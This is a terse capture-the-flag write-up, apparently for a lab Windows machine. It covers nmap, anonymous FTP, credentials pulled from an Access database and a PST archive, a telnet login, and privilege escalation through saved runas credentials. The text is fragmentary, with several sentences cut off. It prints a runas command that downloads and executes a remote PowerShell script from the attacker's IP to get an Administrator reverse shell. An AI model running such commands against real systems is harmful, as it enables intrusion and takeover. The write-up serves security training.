From nmap, there are some ports opened.
This is the web page.
We are allowed to do anonymous login in ftp, and get a file
backup.mdb. In this Microsoft Access Database, we obtain some credentials.
There is a
Access Control.zip in the ftp server as well. After decompressing it with the password from
engineer account, we get
Access Control.pst. In this Personal Storage Table, we obtain the credential for
I tried to login with
secret account from telnet, and succeed. We are now
I opened a powershell reverse shell.
There is a file
ZKAccess...lnk file on the Desktop of Public. There are some
runas command in its content, which is a hint.
runas /user:Access\Administrator /savecred "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/rev2.ps1')\"", I got a reverse shell as user